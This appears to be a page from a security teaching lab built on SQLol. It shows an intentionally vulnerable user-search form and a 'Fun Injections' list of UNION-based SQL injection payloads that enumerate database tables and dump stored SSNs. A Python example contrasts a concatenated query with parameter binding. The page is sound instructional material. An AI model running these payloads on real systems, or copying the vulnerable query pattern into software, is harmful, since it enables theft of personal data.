Vulnerable SQL Query Form

Find Users

Name:

Search Tips

% is a wildcard character

To find all names starting with C, search for C%

To see all names, search for %

A name containing an apostrophe, like O'Neil, will cause an error

Fun Injections

Database Names

' UNION SELECT table_schema AS username FROM information_schema.tables WHERE 'a'='a

Tables in sqlol Database

' UNION SELECT table_name AS username FROM information_schema.tables WHERE table_schema='sqlol

Columns within ssn Table

' UNION SELECT column_name AS username FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol

Dump SSNs

' UNION SELECT concat(name, ':', ssn) AS username FROM sqlol.ssn WHERE 'a'='a
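
Why the apostrophe error and the UNION inputs above work, and what stops them: an added example, not code from this page or from SQLol. It assumes the form pastes the Name field between quotes in a LIKE query; the users/username table, the sample rows and the use of SQLite in place of the lab's database are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the lab's sqlol database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT);
        CREATE TABLE ssn (name TEXT, ssn TEXT);
        INSERT INTO users VALUES ('Chunk'), ('Carol'), ('O''Neil');
        INSERT INTO ssn VALUES ('Chunk', '000-00-0001'), ('Carol', '000-00-0002');
    """)
    return db

def find_users_vulnerable(db, name):
    # Assumed shape of the form's query: input pasted between the quotes,
    # so a quote in the input ends the string and the rest is parsed as SQL.
    sql = "SELECT username FROM users WHERE username LIKE '" + name + "'"
    return sorted(row[0] for row in db.execute(sql))

def find_users_safe(db, name):
    # Placeholder binding: the input is always one string value, never SQL text.
    sql = "SELECT username FROM users WHERE username LIKE ?"
    return sorted(row[0] for row in db.execute(sql, (name,)))

# The page's "Dump SSNs" input, adapted to SQLite syntax (|| instead of concat).
UNION_INPUT = "' UNION SELECT name || ':' || ssn FROM ssn WHERE 'a'='a"

def demo():
    # Run the same three inputs through both versions and collect the outcomes.
    db = make_db()
    results = {}
    cases = [("wildcard", "C%"), ("apostrophe", "O'Neil"), ("union", UNION_INPUT)]
    for label, value in cases:
        for fn in (find_users_vulnerable, find_users_safe):
            try:
                results[(label, fn.__name__)] = fn(db, value)
            except sqlite3.Error as exc:
                results[(label, fn.__name__)] = "error: " + type(exc).__name__
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

With binding, the wildcard search still works, O'Neil is found instead of raising an error, and the UNION input matches no rows.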

Click here to reset the database

Click here to execute raw SQL queries

Click here for a less vulnerable site

Click here for the original SQLol challenges

Source

Based on SQLol from SpiderLabs.


Last revised 1-11-16 by Sam Bowne